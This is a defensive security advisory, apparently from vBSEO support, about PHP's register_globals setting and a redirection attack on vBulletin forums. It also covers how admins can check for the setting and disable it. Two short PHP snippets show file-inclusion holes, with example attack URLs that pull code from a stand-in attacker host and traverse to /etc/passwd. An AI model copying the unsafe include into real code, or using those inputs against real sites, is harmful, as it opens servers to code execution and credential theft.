Rafael Benard

Over the last few months forums have been getting a lot of attention from the hacker community, especially vBulletin based forums.

The lastest attack surfacing in the vBulletin arena is a redirection issue that affected a number of forums in a short timeframe. The root of this problem lays in a very particular scenario.

First and foremost, the majority of the hosting companies work with automated software tools, like cPanel, Plesk, VistaPanel, etc., that save them a lot of time and effort for the small tasks, and depending of the average user, the setup is usually the same, which makes sense, but there's still work to do after getting your site up and running.

A key problem is that many hosts have their automated tools set the register_globals PHP feature to *enabled* by default.

So what is register_globals?

It's a PHP feature that when enabled, will inject your scripts with all sorts of variables, like request variables from HTML forms. This, coupled with the fact that PHP doesn't require variable initialization, creates a problem: writing insecure code is that much easier.

That said, all variables passed through GET or POST are available as global variables in your script (*any* PHP file). Since accessing undeclared variables is not an error in PHP (it's a warning), it can lead to very nasty situations.

Here are some situations where having register_globals enabled could ruin your day:

With the Remote File Inclusion (RFI) attack:

PHP Code:

<?php
    //http://example.com/?path=http://evilbadthings.example.com/
    include "$path"; 
?>

Which will take a file from a remote website and insert it (as a way to say) into your website and execute it. Just imagine a malicious user with a PHP file that can delete all of your website files! Well, that's possible with these kind of attacks.

Local File Inclusion (LFI):

PHP Code:

<?php
    //http://example.com/?path=../../../../etc/passwd
    include "$path"; 
?>

This is another kind of attack, similar to the previous one, but in this case it uses a local file on the server, sometimes to copy the password of a protected area folder, or changing it to a own new password to gain access. This (of course) could lead to a myriad of issues.

The exploit employed in the 123filestore attack took advantage of the register_globals feature set to “enabled” on the infected host, and manipulated various script files, in some cases vBulletin + vBSEO, in other cases vBulletin + other third party scripts (note that the attack was not exclusive to vB + vBSEO sites).

Once injected, the modified scripts took users coming from search engines and redirected them to the 23filestore site, in some cases all the traffic was redirected. Again, this attack was not aimed at a particular site (with say, a combination of scripts such as vB+vBSEO), but directed at vB powered forums in general.

It's worth to mention that the register_globals feature has been DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0.

So what can we do to protect ourselves if running under older versions of PHP (PHP <5.3) within webhosts that have this feature enabled?

First, review your phpinfo() to check if it's enabled, you can do that via the vBulletin Admin Panel by going to: AdminCP > Maintenance > View PHP Info. Once there you'll see the page for the current php.ini, search for register_globals and confirm that is turned off in both columns. If it’s *enabled*, you should contact your host requesting to have the feature disabled for your account.

Register_globals is deprecated, and poses a high security risk in any server running third-party, visible source code scripts that may be available for hackers to review on the undergrounds. It’s definitely a feature forum admins should consider disabling, apart from complying with the standard security best practices, which include keeping the forum up to date, as soon as a new version (or patch) is released, you shall update it immediately.

As always, if you (or your users) experience anything unusual in your forums, double-check it, and please feel free to ask questions here at the vBSEO forums, or via the new Security support category via our support ticket system. Remember, if you can detect an infection on-time, you can save yourself a lot of time and effort.